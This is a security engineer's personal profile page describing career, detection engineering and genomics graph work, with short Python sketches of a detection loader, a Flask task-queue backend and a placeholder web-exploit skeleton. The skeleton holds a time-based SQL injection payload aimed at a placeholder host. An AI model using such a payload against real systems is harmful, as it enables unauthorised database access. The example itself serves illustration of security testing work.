About
I think folks in the Technology industry come to the field in many ways: friends of mine got their start tinkering with electronics, video games, or graphics. I came to Technology from Security, diving into the first release of DEP in my early teens. After 8 years working professionally in the industry, I've been fortunate to hold a diverse set of roles, including:
- Building cutting-edge predictive genomics applications that operate over tens of thousands of genomes, when the standard was only a handful
- Working in Application Security
- Training and building out a top-notch SOC that subsequently caught and remediated intrusions from script kiddies to mid-sized criminal organizations
- Leading Detection Engineering and Threat Hunting for one of the most sought-after targets in the world
- Putting together teams for a novel, graph-backed cybersecurity product
These days I get the most enjoyment from identifying, bringing together, and highlighting key people in organizations to build high-performance teams. I also do a fair amount of technical design and architecture, building initial MVPs, and scaling existing applications for the Enterprise market.
Sounds cheesy now, but I still love this quote:
“…it’s not enough to fight for a better world; we also have to live lives worth fighting for.”
-Eric Greitens, The Heart and the Fist
Technology
Security
I like security data lakes, and I started my professional security career in application security. I've given a few internal talks on it in the past, but my general focus is on "how can we operate Security as an Engineering Practice?" On the Application Security side, I've ripped out and replaced a number of companies' tooling, including:
- SAST
- DAST
- SCA
- Mobile Applications
This is in addition to manual code security work, vulnerability PoCs, and education work.
On the Detection Engineering and Threat Hunting side, I’ve built out:
- Wholly custom features for StreamAlert that I've yet to find time to PR upstream
- Data lakes in AWS, Snowflake, and Azure ADX, plus full-fledged YAML-to-Detection Infrastructure via Go/Pulumi/Terraform (a small Python sketch of the idea follows this list)
- A lot of custom UEBA, insider-threat detections, complex event correlation, and entity normalization
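To make the YAML-to-Detection idea concrete, here's a minimal Python sketch of the shape of it. The production pipelines were Go/Pulumi/Terraform, and the rule schema, table, and field names below are invented for illustration; the point is just that detections live as declarative YAML and get compiled into scheduled queries and alerting resources.

```python
# Minimal sketch only: a made-up YAML rule schema compiled into a
# "scheduled detection" object that a deploy step could turn into
# data lake resources. Not the real Go/Pulumi/Terraform pipeline.
from dataclasses import dataclass

import yaml  # PyYAML

RULE_YAML = """
name: console_login_without_mfa
severity: medium
schedule: rate(15 minutes)
query: |
  SELECT user_identity, source_ip, event_time
  FROM cloudtrail_logs
  WHERE event_name = 'ConsoleLogin'
    AND mfa_used = 'No'
"""

@dataclass
class ScheduledDetection:
    name: str
    severity: str
    schedule: str
    query: str

def load_detection(raw: str) -> ScheduledDetection:
    """Parse a YAML rule into the object a later deploy step would consume."""
    doc = yaml.safe_load(raw)
    return ScheduledDetection(
        name=doc["name"],
        severity=doc["severity"],
        schedule=doc["schedule"],
        query=doc["query"].strip(),
    )

if __name__ == "__main__":
    rule = load_detection(RULE_YAML)
    print(f"{rule.name} [{rule.severity}] runs on schedule: {rule.schedule}")
```

Most of the practical value in this approach is in what the sketch skips: schema validation, per-rule tests, and CI that plans and applies the resulting infrastructure.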
Graphs
I have a few works in this space, and some writing from when I was a student (not listed):
- PyCon 2018: Spfy: analyzing E.coli genomes as graph data link
- Le, K.K., Whiteside, M.D., Hopkins, J.E., Gannon, V.P.J., Laing, C.R. Spfy: an integrated graph database for real-time prediction of bacterial phenotypes and downstream comparative analyses. Database (2018) Vol. 2018: article ID bay086; doi:10.1093/database/bay086
- Work around k-mers / graph label predictions (similar to work around protein structure labelling): Prariedog link and its Golang variant link, plus some early optimizations (PyTorch) for operating on clusters of GPUs, before the advent of cuGraph
- I can probably talk your ear off about Blazegraph (now Neptune), Neo4j, Dgraph, etc.
Open Source
Small contributions to josepy, certbot, some ReactJS libraries, and ML-for-neuroscience libraries, in addition to the predictive genomics applications from my work at the National Microbiology Lab.
Languages
Python
I write a lot of Python, mainly around three use cases: (a) cybersecurity, (b) data science applications, and (c) backends for full-stack applications.
Cybersecurity:
- Application Security: I write web vulnerability PoCs in Python, instead of something like Burp, for everything from handling request flows and writing payloads to database vulnerabilities. I can generally take the details of a CVE, for example one for Redis, and write a PoC for it without any source material, or do the same for my own code security work (a minimal, hypothetical request-flow skeleton is sketched after this list).
- I’m generally a proponent of graph-based application security tooling (like CodeQL) for variant research
- Detection Engineering: I write either pure Python or a mix of Python and a query language (SQL/KQL), depending on the data lake backend
- Instrumentation / Other Pythons: I like Frida for a variety of things, but also use Pyinstrument for more Python/performance use cases. I'm also familiar with non-CPython implementations like PyPy.
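As a concrete (and entirely hypothetical) example of the request-flow skeletons mentioned above: the target, endpoints, credentials, and payload below are placeholders rather than a real CVE, but the structure is the point; a plain requests.Session gives you the same control over auth state and crafted payloads that a proxy tool would.

```python
# Hypothetical request-flow PoC skeleton: establish session state, then
# deliver a crafted payload. Target, endpoints, and payload are placeholders.
import requests

BASE_URL = "http://target.example.local:8080"

def login(session: requests.Session, username: str, password: str) -> None:
    # Set up the cookies / auth state the vulnerable request depends on.
    resp = session.post(
        f"{BASE_URL}/login",
        data={"user": username, "pass": password},
        timeout=10,
    )
    resp.raise_for_status()

def exploit(session: requests.Session) -> requests.Response:
    # In a real PoC, this is where the CVE write-up gets translated into a
    # concrete request body (here: an illustrative injection string).
    payload = {"filter": "1); SELECT pg_sleep(5);--"}
    return session.post(f"{BASE_URL}/api/search", json=payload, timeout=30)

if __name__ == "__main__":
    with requests.Session() as s:
        login(s, "tester", "tester")
        result = exploit(s)
        print(result.status_code, result.elapsed, result.text[:200])
```

From here, a real PoC mostly swaps out the payload and adds whatever response parsing proves the vulnerability.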
Data Science:
- Mostly the classic Python stack: Numpy, Scipy, Pandas, Arrow
- Some niche use cases: DGL, Diffpool, PyTorch
- Data Lakes/HPC: Snowflake, Databricks, ADX, Slurm
Backends for Full Stack:
- I’m more proficient in Flask than Django
- Task Queues: Redis-Queue, Celery
- Generally to support REST APIs, less so GraphQL (a minimal Flask + RQ sketch follows)
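To illustrate the Flask + task queue pattern (the endpoint names and the job itself are made up for this sketch): the REST endpoint enqueues slow work and returns a job id with a 202, and a separate `rq worker` process does the heavy lifting.

```python
# Minimal Flask + RQ sketch: enqueue slow work from a REST endpoint and
# poll for the result. Assumes a local Redis and an `rq worker` process.
from flask import Flask, jsonify
from redis import Redis
from rq import Queue

app = Flask(__name__)
queue = Queue(connection=Redis())

def slow_analysis(dataset_id: str) -> dict:
    # Placeholder for the long-running job the worker executes.
    return {"dataset_id": dataset_id, "status": "analyzed"}

@app.route("/datasets/<dataset_id>/analyze", methods=["POST"])
def analyze(dataset_id: str):
    job = queue.enqueue(slow_analysis, dataset_id)
    return jsonify({"job_id": job.get_id()}), 202

@app.route("/jobs/<job_id>", methods=["GET"])
def job_status(job_id: str):
    job = queue.fetch_job(job_id)
    if job is None:
        return jsonify({"error": "unknown job"}), 404
    return jsonify({"status": job.get_status(), "result": job.result})
```

Keeping the HTTP layer thin like this lets the workers live in separate processes or containers and scale independently of the API.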
JavaScript
ReactJS mainly. For frontends to data analytics applications.
Material Design via react-md, and Polaris React. I was originally a proponent of card-based designs, but lately favor more "workbench"-like designs. My frontend work has been to support visualizing graph-based backends in a manner that is meaningful to end users. I also read a lot of other people's JavaScript as part of my Application Security work.
I have an admittedly weird love of routing (React Router), state management (Redux), and promises (Axios) in React.
R
I learned R during my Neuroscience degree, then switched over to Python and its libraries during my Software Engineering degree.
Go
I’ve written Go for specific use cases:
- Applications that must run on multiple OSes: mainly for my cybersecurity work
- Applications that must be strongly typed, RPC work, and some distributed data-processing services: also cybersecurity
- Some predictive genomics work where it suited the backend data store (Dgraph)
I blog once every few years. See LinkedIn for more formative stuff, GitHub for things I'm working on, and email should you need to get a hold of me.
5AD2 1839 835B 7966 58A4 16E9 A659 BC35 4726 32D7